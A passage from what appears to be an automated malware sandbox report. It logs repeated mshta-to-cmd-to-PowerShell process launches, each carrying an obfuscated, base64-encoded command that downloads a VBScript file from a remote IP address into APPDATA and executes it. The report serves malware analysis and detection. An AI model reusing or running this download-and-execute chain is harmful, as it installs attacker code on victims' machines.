XNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
